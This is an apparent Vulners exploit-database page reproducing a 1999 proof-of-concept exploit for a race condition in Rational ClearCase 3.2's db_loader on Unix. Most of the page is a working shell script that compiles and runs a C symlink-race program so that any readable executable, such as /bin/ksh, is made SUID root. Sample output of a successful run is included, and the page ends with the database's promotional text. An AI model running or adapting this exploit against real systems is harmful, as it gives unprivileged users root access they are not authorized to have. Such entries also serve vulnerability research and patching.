Vulners
Lucene search
Rational Software ClearCase for Unix 3.2 - ClearCase SUID
source: https://www.securityfocus.com/bid/538/info
Rational Software's ClearCase product includes a vulnerability whereby an unprivileged user can have any readable executable set to SUID root.. A 1.5 meg file is copied and then chmod'ed to SUID, and during the time this file is being copied it can be unlinked and replaced with another.
Sample output:
> ./clear_waste.sh /bin/ksh
Clear Case proof of concept exploit code - [email protected] 2.5.1999
one beer please!
creating race grinder....
created!
compiling race grinder...
compiled! Launching attack.... be patient
Looks succesfull!
-r-sr-xr-x 2 bin bin 186356 Jan 21 1998 /bin/ksh
don't forget to get rid of /var/tmp/cleartest
#!/bin/sh
#
# This is sample code that takes advantage of a race condition in
# Pure Atria's Clear Case db_loader program. The program will retain
# ownership of the file pointed to on the command line and have
# the clear case db_loader change the permissions to SUID
# [email protected] 2.5.1999
#
RACE_PROG=./clear_race
RACE_CODE=./clear_race.c
# you probabaly need to change the following to reflect your
# system and setup
#NICE=/usr/bin/nice
CC=/usr/local/bin/gcc
DB_LOADER=/usr/atria/sun5/etc/db_loader
RM=/bin/rm
LS=/bin/ls
MKDIR=/bin/mkdir
# you need to own the DEST DIR so you can delete files that you don't
# directly own
DEST_DIR=/var/tmp/cleartest.$$
if [ "$#" -ne "1" ] ; then
echo "usage: `basename $0` file_to_make_suid"
exit
fi
TARGET=$1
if [ ! -f ${TARGET} ] ; then
echo "target file must exist"
exit
fi
echo
echo "Clear Case proof of concept exploit code - [email protected] 2.5.1999"
echo " one beer please!"
echo
${MKDIR} ${DEST_DIR}
if [ $? -gt 0 ] ; then
echo "go get rid of ${DEST_DIR} and try again..."
exit
fi
cd ${DEST_DIR}
# create the race runner
echo "creating race grinder...."
cat > ${RACE_CODE} << FOEFOE
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
main(int argc, char *argv[])
{
struct stat statbuf;
printf("%d\n", argc);
if (argc != 2){
printf("bzzzzt! - wrong usage\n");
exit(0);
}
while (1){
if (stat("./db_dumper", &statbuf) == 0){
unlink("./db_dumper");
symlink(argv[1], "./db_dumper");
exit(0);
}
}
}
FOEFOE
echo "created!"
echo
# compile it
echo "compiling race grinder..."
${CC} -O2 -o ${RACE_PROG} ${RACE_CODE}
if [ ! -f ${RACE_PROG} ] ; then
echo "compile failed?"
${RM} -f ${RACE_CODE}
exit
fi
echo "compiled! Launching attack.... be patient"
echo
${RACE_PROG} ${TARGET} &
# let us give the progie a second or two to load up and get the runtime
# crap set
sleep 2
#${NICE} -n 2 ${DB_LOADER} ${DEST_DIR} > /dev/null 2>&1
# if you keep failing try the above and potentially increase the nice value
${DB_LOADER} ${DEST_DIR} > /dev/null 2>&1
if [ -u ${TARGET} ] ; then
echo "Looks succesfull!"
${LS} -l ${TARGET}
echo
echo "don't forget to get rid of ${DEST_DIR}"
echo
exit
fi
echo "doesn't look like it worked... "
echo "try again - after all it's a race condition!"
echo "don't forget to get rid of ${DEST_DIR}
echoData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 May 1999 00:00Current
7.4High risk
Vulners AI Score7.4